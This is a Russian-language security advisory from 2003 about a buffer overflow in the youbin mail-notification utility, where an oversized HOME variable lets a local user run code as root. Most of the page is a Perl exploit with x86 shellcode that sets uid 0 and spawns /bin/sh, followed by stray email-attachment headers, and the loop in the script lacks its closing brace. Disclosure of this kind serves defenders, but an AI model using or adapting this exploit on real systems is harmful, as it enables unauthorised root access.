Переполнение буфера в переменной HOME в youbin

Дата публикации:
12.05.2003
Всего просмотров:
707
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в утилите 'youbin'. Локальный пользователь может выполнить произвольный код с root привилегиями.

Локальный пользователь может присвоить переменной HOME чрезмерно длинное, специально обработанное значение, чтобы вызвать переполнение буфера и выполнить произвольный код на системе с root привилегиями. Пример:

#!/usr/bin/perl
# DSR-youbin.pl - kokaninATdtors.net vs. /usr/ports/mail/youbin
# offset, retaddr and shellcode is for my FreeBSD 4.7-RELEASE, YMMV
# shellcode by eSDee, he's cool
# youbin-3.4          Mail arrival notification service package

$len = 512;
$ret = pack("l",0xbfbffd68);
$nop = "\x90";
$shellcode = 	"\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
		"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
		"\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
  
for ($i = 0; $i < $len - length($shellcode); $i++) {
    $buffer .= $nop;
 
$buffer .= $shellcode;
local($ENV{'EGG'}) = $buffer; 
local($ENV{'HOME'}) = $ret x 259;
system("youbin");
------=_NextPart_000_004D_01C313DA.0BD3E420
Content-Type: text/plain;
	name="DSR-youbin.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="DSR-youbin.txt"
Уязвимость обнаружена в youbin 3.4

Ссылки: youbin local root exploit + advisory
или введите имя

CAPTCHA